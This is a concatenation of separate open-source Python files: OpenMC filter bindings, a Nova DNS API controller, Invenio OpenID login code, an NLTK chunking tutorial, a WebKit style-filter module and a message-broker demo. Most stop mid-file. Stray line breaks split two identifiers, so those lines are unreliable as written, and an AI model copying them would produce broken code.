'EnergyoutFilter', 'EnergyFunctionFilter', 'LegendreFilter', 'MaterialFilter',
'MeshFilter', 'MeshSurfaceFilter', 'MuFilter', 'ParticleFilter', 'PolarFilter',
'SphericalHarmonicsFilter', 'SpatialLegendreFilter', 'SurfaceFilter',
'UniverseFilter', 'ZernikeFilter', 'ZernikeRadialFilter', 'filters'
]
# Tally functions
_dll.openmc_cell_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_int32)), POINTER(c_int32)]
_dll.openmc_cell_filter_get_bins.restype = c_int
_dll.openmc_cell_filter_get_bins.errcheck = _error_handler
_dll.openmc_energy_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_double)), POINTER(c_size_t)]
_dll.openmc_energy_filter_get_bins.restype = c_int
_dll.openmc_energy_filter_get_bins.errcheck = _error_handler
_dll.openmc_energy_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_double)]
_dll.openmc_energy_filter_set_bins.restype = c_int
_dll.openmc_energy_filter_set_bins.errcheck = _error_handler
_dll.openmc_energyfunc_filter_set_data.restype = c_int
_dll.openmc_energyfunc_filter_set_data.errcheck = _error_handler
_dll.openmc_energyfunc_filter_set_data.argtypes = [
c_int32, c_size_t, POINTER(c_double), POINTER(c_double)]
_dll.openmc_energyfunc_filter_get_energy.restype = c_int
_dll.openmc_energyfunc_filter_get_energy.errcheck = _error_handler
_dll.openmc_energyfunc_filter_get_energy.argtypes = [
c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))]
_dll.openmc_energyfunc_filter_get_y.restype = c_int
_dll.openmc_energyfunc_filter_get_y.errcheck = _error_handler
_dll.openmc_energyfunc_filter_get_y.argtypes = [
c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))]
_dll.openmc_filter_get_id.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_filter_get_id.restype = c_int
_dll.openmc_filter_get_id.errcheck = _error_handler
_dll.openmc_filter_get_type.argtypes = [c_int32, c_char_p]
_dll.openmc_filter_get_type.restype = c_int
_dll.openmc_filter_get_type.errcheck = _error_handler
_dll.openmc_filter_set_id.argtypes = [c_int32, c_int32]
_dll.openmc_filter_set_id.restype = c_int
_dll.openmc_filter_set_id.errcheck = _error_handler
_dll.openmc_get_filter_index.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_get_filter_index.restype = c_int
_dll.openmc_get_filter_index.errcheck = _error_handler
_dll.openmc_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_legendre_filter_get_order.restype = c_int
_dll.openmc_legendre_filter_get_order.errcheck = _error_handler
_dll.openmc_legendre_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_legendre_filter_set_order.restype = c_int
_dll.openmc_legendre_filter_set_order.errcheck = _error_handler
_dll.openmc_material_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_int32)), POINTER(c_size_t)]
_dll.openmc_material_filter_get_bins.restype = c_int
_dll.openmc_material_filter_get_bins.errcheck = _error_handler
_dll.openmc_material_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_int32)]
_dll.openmc_material_filter_set_bins.restype = c_int
_dll.openmc_material_filter_set_bins.errcheck = _error_handler
_dll.openmc_mesh_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_mesh_filter_get_mesh.restype = c_int
_dll.openmc_mesh_filter_get_mesh.errcheck = _error_handler
_dll.openmc_mesh_filter_set_mesh.argtypes = [c_int32, c_int32]
_dll.openmc_mesh_filter_set_mesh.restype = c_int
_dll.openmc_mesh_filter_set_mesh.errcheck = _error_handler
_dll.openmc_meshsurface_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_meshsurface_filter_get_mesh.restype = c_int
_dll.openmc_meshsurface_filter_get_mesh.errcheck = _error_handler
_dll.openmc_meshsurface_filter_set_mesh.argtypes = [c_int32, c_int32]
_dll.openmc_meshsurface_filter_set_mesh.restype = c_int
_dll.openmc_meshsurface_filter_set_mesh.errcheck = _error_handler
_dll.openmc_new_filter.argtypes = [c_char_p, POINTER(c_int32)]
_dll.openmc_new_filter.restype = c_int
_dll.openmc_new_filter.errcheck = _error_handler
_dll.openmc_spatial_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_spatial_legendre_filter_get_order.restype = c_int
_dll.openmc_spatial_legendre_filter_get_order.errcheck = _error_handler
_dll.openmc_spatial_legendre_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_spatial_legendre_filter_set_order.restype = c_int
_dll.openmc_spatial_legendre_filter_set_order.errcheck = _error_handler
_dll.openmc_sphharm_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_sphharm_filter_get_order.restype = c_int
_dll.openmc_sphharm_filter_get_order.errcheck = _error_handler
_dll.openmc_sphharm_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_sphharm_filter_set_order.restype = c_int
_dll.openmc_sphharm_filter_set_order.errcheck = _error_handler
_dll.openmc_zernike_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_zernike_filter_get_order.restype = c_int
_dll.openmc_zernike_filter_get_order.errcheck = _error_handler
_dll.openmc_zernike_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_zernike_filter_set_order.restype = c_int
_dll.openmc_zernike_filter_set_order.errcheck = _error_handler
_dll.tally_filters_size.restype = c_size_t
class Filter(_FortranObjectWithID):
__instances = WeakValueDictionary()
def __new__(cls, obj=None, uid=None, new=True, index=None):
mapping = filters
if index is None:
if new:
# Determine ID to assign
if uid is None:
uid = max(mapping, default=0) + 1
else:
if uid in mapping:
raise AllocationError('A filter with ID={} has already '
'been allocated.'.format(uid))
# Set the filter type -- note that the filter_type attribute
# only exists on subclasses!
index = c_int32()
_dll.openmc_new_filter(cls.filter_type.encode(), index)
index = index.value
else:
index = mapping[uid]._index
if index not in cls.__instances:
instance = super().__new__(cls)
instance._index = index
if uid is not None:
instance.id = uid
cls.__instances[index] = instance
return cls.__instances[index]
@property
def id(self):
filter_id = c_int32()
_dll.openmc_filter_get_id(self._index, filter_id)
return filter_id.value
@id.setter
def id(self, filter_id):
_dll.openmc_filter_set_id(self._index, filter_id)
class EnergyFilter(Filter):
filter_type = 'energy'
def __init__(self, bins=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if bins is not None:
self.bins = bins
@property
def bins(self):
energies = POINTER(c_double)()
n = c_size_t()
_dll.openmc_energy_filter_get_bins(self._index, energies, n)
return as_array(energies, (n.value,))
@bins.setter
def bins(self, bins):
# Get numpy array as a double*
energies = np.asarray(bins)
energies_p = energies.ctypes.data_as(POINTER(c_double))
_dll.openmc_energy_filter_set_bins(
self._index, len(energies), energies_p)
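# Hedged usage sketch (values illustrative, requires a loaded libopenmc):
# f = EnergyFilter(bins=np.logspace(-5, 7, 50))
# f.bins # -> the 50 edges read back through openmc_energy_filter_get_bins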
class EnergyoutFilter(EnergyFilter):
filter_type = 'energyout'
class AzimuthalFilter(Filter):
filter_type = 'azimuthal'
class CellFilter(Filter):
filter_type = 'cell'
@property
def bins(self):
cells = POINTER(c_int32)()
n = c_int32()
_dll.openmc_cell_filter_get_bins(self._index, cells, n)
return as_array(cells, (n.value,))
badock/nova | nova/api/openstack/compute/plugins/v3/floating_ip_dns.py | Python | apache-2.0 | 10,441 | 0.000958
# Copyright 2011 Andrew Bogott for the Wikimedia Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import urllib
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import exception
from nova.i18n import _
from nova import network
from nova import utils
ALIAS = "os-floating-ip-dns"
authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS)
def _translate_dns_entry_view(dns_entry):
result = {}
result['ip'] = dns_entry.get('ip')
result['id'] = dns_entry.get('id')
result['type'] = dns_entry.get('type')
result['domain'] = dns_entry.get('domain')
result['name'] = dns_entry.get('name')
return {'dns_entry': result}
def _translate_dns_entries_view(dns_entries):
return {'dns_entries': [_translate_dns_entry_view(entry)['dns_entry']
for entry in dns_entries]}
def _translate_domain_entry_view(domain_entry):
result = {}
result['domain'] = domain_entry.get('domain')
result['scope'] = domain_entry.get('scope')
result['project'] = domain_entry.get('project')
result['availability_zone'] = domain_entry.get('availability_zone')
return {'domain_entry': result}
def _translate_domain_entries_view(domain_entries):
return {'domain_entries':
[_translate_domain_entry_view(entry)['domain_entry']
for entry in domain_entries]}
def _unquote_domain(domain):
"""Unquoting function for receiving a domain name in a URL.
Domain names tend to have .'s in them. Urllib doesn't quote dots,
but Routes tends to choke on them, so we need an extra level of
by-hand quoting here.
"""
return urllib.unquote(domain).replace('%2E', '.')
def _create_dns_entry(ip, name, domain):
return {'ip': ip, 'name': name, 'domain': domain}
def _create_domain_entry(domain, scope=None, project=None, av_zone=None):
return {'domain': domain, 'scope': scope, 'project': project,
'availability_zone': av_zone}
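# Hedged example (values illustrative): _translate_domain_entry_view wraps a
# domain dict as {'domain_entry': {'domain': 'example.org', 'scope': 'public',
# 'project': 'demo', 'availability_zone': None}} for the JSON response body.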
class FloatingIPDNSDomainController(object):
"""DNS domain controller for OpenStack API."""
def __init__(self):
super(FloatingIPDNSDomainController, self).__init__()
self.network_api = network.API()
@extensions.expected_errors(501)
def index(self, req):
"""Return a list of available DNS domains."""
context = req.environ['nova.context']
authorize(context)
try:
domains = self.network_api.get_dns_domains(context)
except NotImplementedError:
msg = _("Unable to create dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
domainlist = [_create_domain_entry(domain['domain'],
domain.get('scope'),
domain.get('project'),
domain.get('availability_zone'))
for domain in domains]
return _translate_domain_entries_view(domainlist)
@extensions.expected_errors((422, 501))
def update(self, req, id, body):
"""Add or modify domain entry."""
context = req.environ['nova.context']
authorize(context)
fqdomain = _unquote_domain(id)
try:
entry = body['domain_entry']
scope = entry['scope']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
project = entry.get('project', None)
av_zone = entry.get('availability_zone', None)
if (scope not in ('private', 'public') or
project and av_zone or
scope == 'private' and project or
scope == 'public' and av_zone):
raise webob.exc.HTTPUnprocessableEntity()
try:
if scope == 'private':
create_dns_domain = self.network_api.create_private_dns_domain
area_name, area = 'availability_zone', av_zone
else:
create_dns_domain = self.network_api.create_public_dns_domain
area_name, area = 'project', project
except NotImplementedError:
msg = _("Unable to create dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
create_dns_domain(context, fqdomain, area)
return _translate_domain_entry_view({'domain': fqdomain,
'scope': scope,
area_name: area})
@extensions.expected_errors((404, 501))
@wsgi.response(202)
def delete(self, req, id):
"""Delete the domain identified by id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(id)
# Delete the whole domain
try:
self.network_api.delete_dns_domain(context, domain)
except NotImplementedError:
msg = _("Unable to delete dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
class FloatingIPDNSEntryController(object):
"""DNS Entry controller for OpenStack API."""
def __init__(self):
super(FloatingIPDNSEntryController, self).__init__()
self.network_api = network.API()
@extensions.expected_errors((422, 404, 501))
def show(self, req, domain_id, id):
"""Return the DNS entry that corresponds to domain_id and id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
floating_ip = None
# Check whether id is a valid ipv4/ipv6 address.
if utils.is_valid_ipv4(id) or utils.is_valid_ipv6(id):
floating_ip = id
try:
if floating_ip:
entries = self.network_api.get_dns_entries_by_address(context,
floating_ip,
domain)
else:
entries = self.network_api.get_dns_entries_by_name(context,
id,
domain)
except NotImplementedError:
msg = _("Unable to get dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
if not entries:
explanation = _("DNS entries not found.")
raise webob.exc.HTTPNotFound(explanation=explanation)
if floating_ip:
entrylist = [_create_dns_entry(floating_ip, entry, domain)
for entry in entries]
dns_entries = _translate_dns_entries_view(entrylist)
return wsgi.ResponseObject(dns_entries)
entry = _create_dns_entry(entries[0], id, domain)
return _translate_dns_entry_view(entry)
@extensions.expected_errors((422, 501))
def update(self, req, domain_id, id, body):
"""Add or modify dns entry."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
entry = body['dns_entry']
address = entry['ip']
dns_type = entry['dns_type']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
try:
entries = self.network_api.get_dns_entries_by_name(context,
name, domain)
Panos512/invenio | modules/webaccess/lib/external_authentication_openid.py | Python | gpl-2.0 | 6,658 | 0.004356
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2012 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
This module contains functions and methods to authenticate with OpenID
providers.
"""
__revision__ = \
"$Id$"
from invenio.config import CFG_SITE_SECURE_URL
from invenio.external_authentication import ExternalAuth
from invenio.session import get_session
class ExternalOpenID(ExternalAuth):
"""
Contains methods for authenticate with an OpenID provider.
"""
@staticmethod
def __init_req(req):
req.g['openid_provider_name'] = ''
req.g['openid_debug'] = 0
req.g['openid_msg'] = ''
req.g['openid_debug_msg'] = ''
req.g['openid_response'] = None
def auth_user(self, username, password, req=None):
"""
Tries to find email and OpenID identity of the user. If it
doesn't find any of them, returns (None, None)
@param username: Isn't used in this function
@type username: str
@param password: Isn't used in this function
@type password: str
@param req: request
@type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest
@rtype: str|NoneType, str|NoneType
"""
from openid.consumer import consumer
self._get_response(req)
response = req.g['openid_response']
identity = None
email = None
if response.status == consumer.SUCCESS:
# In the first login of the user, fetches his/her email
# from OpenID provider.
email = self._get_email_from_success_response(req)
identity = response.getDisplayIdentifier()
elif response.status == consumer.CANCEL:
# If user cancels the verification, set corresponding message.
req.g['openid_msg'] = 21
elif response.status == consumer.FAILURE:
# If verification fails, set corresponding message.
req.g['openid_msg'] = 22
return email, identity
@staticmethod
def get_msg(req):
return req.g['openid_msg']
def fetch_user_nickname(self, username, password=None, req=None):
"""
Fetches the OpenID provider for nickname of the user. If it doesn't
find any, returns None.
This function doesn't need username, password or req. They exist
just because this class is derived from ExternalAuth
@param username: Isn't used in this function
@type username: str
@param password: Isn't used in this function
@type password: str
@param req: request
@type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest
@rtype: str|NoneType
"""
from openid.extensions import ax
from openid.extensions import sreg
nickname = None
# May be either Simple Registration (sreg) response or
# Attribute Exchange (ax) response.
sreg_resp = None
ax_resp = None
response = req.g['openid_response']
sreg_resp = sreg.SRegResponse.fromSuccessResponse(response)
if sreg_resp:
if sreg_resp.getExtensionArgs().has_key('nickname'):
nickname = sreg_resp.getExtensionArgs()['nickname']
ax_resp = ax.FetchResponse.fromSuccessResponse(response)
if ax_resp and not nickname:
extensions = ax_resp.getExtensionArgs()
if extensions.has_key('type.ext0') and \
extensions.has_key('value.ext0.1'):
if extensions['type.ext0'] == \
'http://axschema.org/namePerson/friendly':
nickname = extensions['value.ext0.1']
if extensions.has_key('type.ext1') and \
extensions.has_key('value.ext1.1') and not nickname:
if extensions['type.ext1'] == \
'http://axschema.org/namePerson/friendly':
nickname = extensions['value.ext1.1']
return nickname
@staticmethod
def _get_email_from_success_response(req):
"""
Fetches the email from consumer.SuccessResponse. If it doesn't find any
returns None.
@rtype: str|NoneType
"""
from openid.extensions import ax
email = None
response = req.g['openid_response']
ax_resp = ax.FetchResponse.fromSuccessResponse(response)
if ax_resp:
extensions = ax_resp.getExtensionArgs()
if extensions.has_key('type.ext0') and \
extensions.has_key('value.ext0.1'):
if extensions['type.ext0'] == \
'http://axschema.org/contact/email':
email = extensions['value.ext0.1']
if extensions.has_key('type.ext1') and \
extensions.has_key('value.ext1.1') and not email:
if extensions['type.ext1'] == \
'http://axschema.org/contact/email':
email = extensions['value.ext1.1']
return email
@staticmethod
def _get_response(req):
"""
Constructs the response returned from the OpenID provider
@param req: request
@type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest
"""
from invenio.webinterface_handler import wash_urlargd
from openid.consumer import consumer
content = {}
for key in req.form.keys():
content[key] = (str, '')
args = wash_urlargd(req.form, content)
if args.has_key('ln'):
del args['ln']
if args.has_key('referer'):
if not args['referer']:
del args['referer']
oidconsumer = consumer.Consumer({"id": get_session(req)}, None)
url = CFG_SITE_SECURE_URL + "/youraccount/login"
req.g['openid_provider_name'] = args['provider']
req.g['openid_response'] = oidconsumer.complete(args, url)
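# Hedged note: fetch_user_nickname and _get_email_from_success_response probe
# both AX slots (type.ext0 / type.ext1) because providers differ in which slot
# carries http://axschema.org/namePerson/friendly vs contact/email.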
DoWhatILove/turtle | programming/python/library/nltk/information_extraction.py | Python | mit | 4,285 | 0.018203
#%%
# information extraction: getting meaning from text
import nltk, re, pprint
def preprocess(document):
sents = nltk.sent_tokenize(document)
sents = [nltk.word_tokenize(sent) for sent in sents]
sents = [nltk.pos_tag(sent) for sent in sents]
return sents
#%% chunking
# NP-chunking
# one of most useful sources of information for NP-chunking is POS tags
sentence = [("the", "DT"), ("little", "JJ"), ("yellow", "JJ"), ("dog", "NN"), ("barked", "VBD"), ("at", "IN"), ("the", "DT"), ("cat", "NN")]
grammar = "NP: {<DT>?<JJ>*<NN>}"
cp = nltk.RegexpParser(grammar)
result = cp.parse(sentence)
print(result)
result.draw()
#%%
from nltk.corpus import conll2000
print(conll2000.chunked_sents('train.txt')[99])
print(conll2000.chunked_sents('train.txt',chunk_types=['NP'])[99])
#%%
cp = nltk.RegexpParser("")
test_sents = conll2000.chunked_sents('test.txt',chunk_types=['NP'])
print(cp.evaluate(test_sents))
#%%
grammar = r"NP: {<[CDJNP].*>+}"
cp = nltk.RegexpParser(grammar)
print(cp.evaluate(test_sents))
#%%
class UnigramChunker(nltk.ChunkParserI):
def __init__(self,train_sents):
train_data = [[(t,c) for w,t,c in nltk.chunk.tree2conlltags(sent)] for sent in train_sents]
self.tagger = nltk.UnigramTagger(train_data)
def parse(self,sentence):
pos_tags = [pos for (word,pos) in sentence]
tagged_pos_tags = self.tagger.tag(pos_tags)
chunktags = [chunktag for (pos,chunktag) in tagged_pos_tags]
conlltags = [(word,pos,chunktag) for ((word,pos),chunktag) in zip(sentence,chunktags)]
return nltk.chunk.conlltags2tree(conlltags)
test_sents = conll2000.chunked_sents('test.txt', chunk_types=['NP'])
train_sents = conll2000.chunked_sents('train.txt',chunk_types=['NP'])
unigram_chunker = UnigramChunker(train_sents)
print(unigram_chunker.evaluate(test_sents))
#%% what learned
postags = sorted(set(pos for sent in train_sents
for (word,pos) in sent.leaves()))
print(unigram_chunker.tagger.tag(postags))
#%% classifier based chunker
# not only pos tag, but also word content
class ConsecutiveNPChunkTagger(nltk.TaggerI):
def __init__(self, train_sents):
train_set = []
for tagged_sent in train_sents:
untagged_sent = nltk.tag.untag(tagged_sent)
history = []
for i, (word, tag) in enumerate(tagged_sent):
featureset = npchunk_features(untagged_sent, i, history)
train_set.append( (featureset, tag) )
history.append(tag)
self.classifier = nltk.NaiveBayesClassifier.train(
train_set)
def tag(self, sentence):
history = []
for i, word in enumerate(sentence):
featureset = npchunk_features(sentence, i, history)
tag = self.classifier.classify(featureset)
history.append(tag)
return zip(sentence, history)
class ConsecutiveNPChunker(nltk.ChunkParserI):
def __init__(self, train_sents):
tagged_sents = [[((w,t),c) for (w,t,c) in
nltk.chunk.tree2conlltags(sent)]
for sent in train_sents]
self.tagger = ConsecutiveNPChunkTagger(tagged_sents)
def parse(self, sentence):
tagged_sents = self.tagger.tag(sentence)
conlltags = [(w,t,c) for ((w,t),c) in tagged_sents]
return nltk.chunk.conlltags2tree(conlltags)
#%%
def npchunk_features(sentence,i,history):
word,pos = sentence[i]
if i == 0:
prevword,prevpos = "<START>","<START>"
else:
prevword,prevpos = sentence[i-1]
if i == len(sentence)-1:
nextword,nextpos = "<END>","<END>"
else:
nextword,nextpos = sentence[i+1]
return {
"pos":pos,
"prevpos":prevpos,
"word":word,
"nextpos":nextpos,
"prevpos+pos":"%s+%s" % (prevpos,pos),
"pos+nextpos":"%s+%s" % (pos,nextpos),
"tags-since-dt":tags
|
_since_dt(sentence,i)}
def tags_since_dt(sentence,i):
tags = set()
for word,pos in sentence[:i]:
if pos == "DT":
tags = set()
else:
tags.add(pos)
return '+'.join(sorted(tags))
#%%
chunker = ConsecutiveNPChunker(train_sents)
print(chunker.evaluate(test_sents))
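#%%
# Hedged usage sketch (added for illustration, not in the original source):
# once trained above, the classifier-based chunker can parse any POS-tagged
# sentence; the example sentence here is an assumption.
example = [("the", "DT"), ("quick", "JJ"), ("fox", "NN"), ("ran", "VBD")]
print(chunker.parse(example))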
|
cattleprod/samsung-kernel-gt-i9100
|
external/webkit/WebKitTools/Scripts/webkitpy/style/filter.py
|
Python
|
gpl-2.0
| 11,910 | 0.00084 |
# Copyright (C) 2010 Chris Jerdonek (chris.jerdonek@gmail.com)
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains filter-related code."""
def validate_filter_rules(filter_rules, all_categories):
"""Validate the given filter rules, and raise a ValueError if not valid.
Args:
filter_rules: A list of boolean filter rules, for example--
["-whitespace", "+whitespace/braces"]
all_categories: A list of all available category names, for example--
["whitespace/tabs", "whitespace/braces"]
Raises:
ValueError: An error occurs if a filter rule does not begin
with "+" or "-" or if a filter rule does not match
the beginning of some category name in the list
of all available categories.
"""
for rule in filter_rules:
if not (rule.startswith('+') or rule.startswith('-')):
raise ValueError('Invalid filter rule "%s": every rule '
"must start with + or -." % rule)
for category in all_categories:
if category.startswith(rule[1:]):
break
else:
raise ValueError('Suspected incorrect filter rule "%s": '
"the rule does not match the beginning "
"of any category name." % rule)
class _CategoryFilter(object):
"""Filters whether to check style categories."""
def __init__(self, filter_rules=None):
"""Create a category filter.
Args:
filter_rules: A list of strings that are filter rules, which
are strings beginning with the plus or minus
symbol (+/-). The list should include any
default filter rules at the beginning.
Defaults to the empty list.
Raises:
ValueError: Invalid filter rule if a rule does not start with
plus ("+") or minus ("-").
"""
if filter_rules is None:
filter_rules = []
self._filter_rules = filter_rules
self._should_check_category = {} # Cached dictionary of category to True/False
def __str__(self):
return ",".join(self._filter_rules)
# Useful for unit testing.
def __eq__(self, other):
"""Return whether this CategoryFilter
|
instance is equal to another."""
return self._filter_rules == other._filter_rules
# Useful for unit testing.
def __ne__(self, other):
# Python does not automatically deduce from __eq__().
return not (self == other)
def should_check(self, category):
"""Return whether the category should be checked.
The rules for determining whether a category should be checked
are as follows. By default all categories should be checked.
Then apply the filter rules in order from first to last, with
later flags taking precedence.
A filter rule applies to a category if the string after the
leading plus/minus (+/-) matches the beginning of the category
name. A plus (+) means the category should be checked, while a
minus (-) means the category should not be checked.
"""
if category in self._should_check_category:
return self._should_check_category[category]
should_check = True # All categories checked by default.
for rule in self._filter_rules:
if not category.startswith(rule[1:]):
continue
should_check = rule.startswith('+')
self._should_check_category[category] = should_check # Update cache.
return should_check
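# Hedged usage sketch (illustrative, not part of the original module):
# later rules take precedence, so "-whitespace" is overridden for the
# braces sub-category by the subsequent "+whitespace/braces" rule.
#
#   f = _CategoryFilter(["-whitespace", "+whitespace/braces"])
#   f.should_check("whitespace/tabs")    # -> False
#   f.should_check("whitespace/braces")  # -> True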
class FilterConfiguration(object):
"""Supports filtering with path-specific and user-specified rules."""
def __init__(self, base_rules=None, path_specific=None, user_rules=None):
"""Create a FilterConfiguration instance.
Args:
base_rules: The starting list of filter rules to use for
processing. The default is the empty list, which
by itself would mean that all categories should be
checked.
path_specific: A list of (sub_paths, path_rules) pairs
that stores the path-specific filter rules for
appending to the base rules.
The "sub_paths" value is a list of path
substrings. If a file path contains one of the
substrings, then the corresponding path rules
are appended. The first substring match takes
precedence, i.e. only the first match triggers
an append.
The "path_rules" value is the tuple of filter
rules that can be appended to the base rules.
The value is a tuple rather than a list so it
can be used as a dictionary key. The dictionary
is for caching purposes in the implementation of
this class.
user_rules: A list of filter rules that is always appended
to the base rules and any path rules. In other
words, the user rules take precedence over the
everything. In practice, the user rules are
provided by the user from the command line.
"""
if base_rules is None:
base_rules = []
if path_specific is None:
path_specific = []
if user_rules is None:
user_rules = []
self._base_rules = base_rules
self._path_specific = path_specific
self._path_specific_lower = None
"""The backing store for self._get_path_specific_lower()."""
# FIXME: Make user rules internal after the FilterConfiguration
# attribute is removed from ProcessorOptions (since at
# that point ArgumentPrinter will no longer need to
# access FilterConfiguration.user_rules).
self.user_rules = user_rules
self._path_rules_to_filter = {}
"""Cached dictionary of path rules to CategoryFilter instance."""
# The same CategoryFilter instance can be shared across
# multiple keys in this dictionary. This allows us to take
# greater advantage of the caching done by
# CategoryFilter.should_check().
self._path_to_filter = {}
"""Cached dictionary of file path to CategoryFilter instance."""
# Useful for unit testing.
def __eq__(self, other):
"""Return whether this FilterConfiguration is equal to another."""
if self._base_rules != other._base_rules:
return False
if self._path_specific != other._path_sp
|
ted-dunstone/ivs
|
hub_demo/send_msg.py
|
Python
|
mit
| 11,161 | 0.021862 |
#!/usr/bin/env python
import sys
import os
import getopt
import time
import random
from messageQueue import MessageQueue
VERSION = 0.5
REQUEST_EXCHANGE = {"name":"Request", "ex_type":"headers"}
IDENTIFY_EXCHANGE = {"name":"Identify", "ex_type":"headers"}
RESULTS_EXCHANGE = {"name":"Results", "ex_type":"headers"}
TRANSFORM_EXCHANGE = {"name":"Transform", "ex_type":"headers"}
WEB_EXCHANGE = {"name":"Web", "ex_type":"headers"}
NIST_EXCHANGE = {"name":"NIST", "ex_type":"headers"}
SETTINGS_EXCHANGE = {'name':'settings','ex_type':'x-lvc'}
EXCHANGES = [REQUEST_EXCHANGE,IDENTIFY_EXCHANGE,RESULTS_EXCHANGE,TRANSFORM_EXCHANGE, WEB_EXCHANGE, NIST_EXCHANGE]
class MessageBrokerBase(MessageQueue):
# Base class
def __init__(self, node_name, user_id="guest",header={},exchange_info = REQUEST_EXCHANGE,routing_key='',settings=None):
super(MessageBrokerBase, self).__init__(node_name, user_id,settings=settings)
self.exchange = exchange_info
self.setup()
self.request_queue=self.queue_bind(self.exchange, header) #, routing_key)
self.log( 'starting '+self.__class__.__name__+' binding to '+exchange_info["name"])
def start(self, ):
self.start_consume(self.request_queue)
def local_exchage(self, ):
return {"name":self.node_name, "ex_type":"headers"}
def setup(self, ):
pass
#self.queue_name = self.channel.queue_declare( exclusive=False, queue = self.node_name).method.queue
# queue = "aa_"+self.node_name
class Broker(MessageBrokerBase):
# the broker class - binds to the REQUEST_EXCHANGE sends to the IDENTIFY_EXCHANGE
def __init__(self, user_id="guest",header={},exchange_info = REQUEST_EXCHANGE,settings=None):
super(Broker, self).__init__("Broker", user_id,header, exchange_info,settings=settings)
def setup(self, ):
#setup the exchanges
super(Broker, self).setup()
for exchange in EXCHANGES:
self.channel.exchange_declare(exchange=exchange["name"], type=exchange["ex_type"])
def on_return_status(self, properties):
# called as RPC to return the status of a sent msg
return "[OK] from %s"%self.node_name
def on_recieve_callback(self, ch, method, properties, body):
super(Broker,self).on_recieve_callback(ch, method, properties, body)
if 'filetype' in properties.headers:
import sys,re
import json
sys.path.append("..")
import modules.NISTutility as nu
#try:
filename = './output.eft'
filestr = re.search(r'base64,(.*)', json.loads(body)['file_content']).group(1)
output = open(filename, 'wb')
output.write(filestr.decode('base64'))
output.close()
NISTResult=nu.convertNIST(filename,'jpg','new_i'+filename)
self.send(WEB_EXCHANGE, json.dumps(NISTResult), properties.headers, False)
#except:
# self.send(WEB_EXCHANGE, "ERROR", properties.headers, False)
if 'setup' in properties.headers:
# Send the message back to the receiever
exchange = RESULTS_EXCHANGE
